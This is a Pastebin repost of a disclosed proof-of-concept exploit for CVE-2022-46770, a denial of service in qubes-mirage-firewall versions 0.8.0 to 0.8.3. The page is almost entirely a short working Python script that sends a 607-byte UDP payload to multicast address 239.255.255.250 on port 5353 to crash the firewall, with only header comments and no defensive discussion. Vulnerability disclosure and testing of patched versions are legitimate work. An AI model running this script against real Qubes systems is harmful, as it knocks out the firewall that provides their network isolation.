Advertisement
FlyFar

qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) - CVE-2022-46770

Jan 30th, 2024
867
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.65 KB | Cybersecurity | 0 0
  1. # Exploit Title: qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)
  2. # Date: 2022-12-04
  3. # Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
  4. # Vendor Homepage: https://mirage.io/blog/MSA03
  5. # Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
  6. # Version: >= 0.8.0 & < 0.8.4
  7. # Tested on: Qubes OS
  8. # CVE: CVE-2022-46770
  9.  
  10. #PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
  11.  
  12. #!/usr/bin/env python3
  13.  
  14. from socket import socket, AF_INET, SOCK_DGRAM
  15.  
  16. TARGET = "239.255.255.250"
  17.  
  18. PORT = 5353
  19.  
  20. PAYLOAD = b'a' * 607
  21.  
  22. s = socket(AF_INET, SOCK_DGRAM)
  23.  
  24. s.sendto(PAYLOAD, (TARGET, PORT))
  25.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement